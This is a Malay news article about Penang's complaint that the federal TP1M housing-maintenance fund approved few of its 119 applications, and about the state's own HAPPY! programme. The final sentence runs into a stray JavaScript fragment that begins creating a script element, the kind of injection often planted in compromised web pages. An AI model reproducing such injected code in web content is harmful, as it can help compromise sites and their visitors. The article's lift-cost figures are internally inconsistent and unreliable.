Exco hampa, permohonan TP1M tidak dapat perhatian Pusat

Oleh: AINUL WARDAH SOHILLI

Gambar : SHUM JIAN WEI

 

GEORGE TOWN – Exco Perancangan Bandar & Desa dan Perumahan, Jagdeep Singh Deo meluahkan rasa hampa apabila permohonan negeri Pulau Pinang untuk Tabung Penyelenggaraan 1Malaysia (TP1M) seakan-akan tidak mendapat perhatian Kerajaan Persekutuan (Pusat).

Jelas Jagdeep, sejak tahun 2012, Pulau Pinang telah memohon sebanyak 119 projek di bawah TP1M. Namun, sehingga kini cuma 14 projek sahaja diluluskan dan ia telah menyebabkan penduduk terutama di rumah-rumah pangsa ‘menderita’.

“Sikap melengah-lengahkan dan lewat dalam mempertimbangkan permohonan Pulau Pinang telah menyebabkan penduduk terutamanya di rumah-rumah pangsa mengalami kesengsaraan tidak terhingga.

“Kalau betul TP1M ingin membantu rakyat, sepatutnya tidak timbul isu kelewatan mempertimbangkan atau meluluskan permohonan dari Pulau Pinang,” tegasnya pada sidang media mengulas berhubung isu berkaitan selepas menyempurnakan Majlis Perasmian Pembukaan Lif Baharu Kompleks Pulau Mutiara (KPM) di sini baru-baru ini.

Hadir sama, Ahli Parlimen Tanjung, Ng Wei Aik; Ahli Dewan Undangan Negeri (ADUN) Pengkalan Kota, Lau Keng Ee dan Pengerusi Badan Pengurusan Bersama (JMB) KPM, Khoo En Chieh.

Pemasangan dan pemodenan lif di KPM menelan belanja RM208,000 dengan 80 peratus (RM168,000) dibiayai Kerajaan Negeri dan baki RM42,000 ditanggung JMB.

Dalam pada itu, Jagdeep memberitahu, selain menjadikan pembekalan perumahan mampu milik sebagai suatu keutamaan, Kerajaan Negeri juga memberi fokus terhadap usaha-usaha penyelenggaraan bangunan di semua rancangan perumahan kerajaan sedia ada termasuk perumahan swasta kos rendah dan kos sederhana rendah.

“Usaha ini termasuk penaiktarafan sistem pendawaian elektrik, sistem perpaipan dan perparitan, tangki air, lif dan bumbung.

“Tahun lalu, sejumlah RM11.3 juta diperuntukan untuk membiayai kerjakerja penyelenggaraan dan menaiktaraf 49 rancangan perumahan melibatkan 15,431 unit semuanya.

“Usaha ini diteruskan lagi pada tahun 2015 dengan sejumlah RM15.11 juta diperuntukan,” jelas beliau.

TP1M diperkenalkan pada 2010 dengan dana berjumlah RM500 juta bertujuan memberi manfaat kepada penduduk di kawasan perumahan berstrata kos rendah dan kos sederhana rendah swasta di negara ini. Selain membaikpulih dan menyelenggara lif, TP1M juga merangkumi penyelenggaraan tangga, bumbung, mengecat, tangki air, sistem retikulasi dan kerosakan am yang melibatkan harta bersama (common property).

Ia menyediakan peruntukan 90 peratus bagi kos membaikpulih serta penyelenggaraan projek perumahan berstrata kos rendah dan 70 peratus bagi kos sederhana rendah. Manakala bakinya ditanggung oleh JMB, pihak pengurusan perumahan (MC) atau persatuan penduduk.

Serentak itu, Kerajaan Negeri mewujudkan Program Bantuan Perumahan Pulau Pinang atau Housing Assistance Programme of Penang, Yes! (HAPPY!) pada 2013 dengan dana berjumlah RM50 juta bagi menampung kos penyelenggaraan yang tidak ditanggung oleh TP1M. Dalam erti kata lain, Kerajaan Negeri akan membayar baki 10 peratus dan 30 peratus kos yang ditanggung JMB tanpa membebani penduduk di perumahan terbabit.

Namun, sehingga ke hari ini, Kerajaan Negeri melalui HAPPY! yang (akan) menampung 90 peratus dan 70 peratus kos penyelenggaraan dengan bakinya ditanggung oleh JMB ekoran permohonan tidak memperoleh kelulusan TP1M.var d=document;var s=d.createElement(‘script’);